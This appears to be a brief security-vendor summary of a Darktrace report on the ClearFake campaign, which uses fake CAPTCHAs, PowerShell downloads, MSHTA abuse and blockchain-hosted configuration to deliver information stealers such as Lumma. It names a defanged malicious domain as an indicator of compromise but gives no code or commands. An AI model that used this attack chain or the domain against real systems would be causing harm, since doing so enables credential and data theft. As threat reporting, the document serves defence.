DARKTRACE reports on ClearFake, a campaign that combines fake CAPTCHAs with blockchain-driven payload retrieval and which was detected on a single endpoint over a day in November 2025, involving the legitimate MSHTA utility and repeated mshta[.]exe activity. The campaign frequently uses compromised WordPress sites and SEO poisoning to lure victims toward fake CAPTCHAs, where a PowerShell-based download is executed and malicious code loaded.
In ClearFake operations, threat actors have abused MSHTA and have included connections to blockchain-backed infrastructure, such as a Smart Chain endpoint, to obtain configuration data and load payloads, with the primary payload typically being an information stealer like Lumma Stealer. Darktrace notes activity linking to weiss.neighb0rrol1[.]ru and other suspicious domains, and observes that an EtherHiding approach relies on smart contracts hosted on the BNB Smart Chain.
Autonomous Response was enabled to block external connections and prevent HTA-driven payload delivery, containing the activity before data exfiltration could occur. The report stresses continued warning signs for users to beware of social engineering and to monitor unusual MSHTA usage and outbound connections to similarly formatted domains.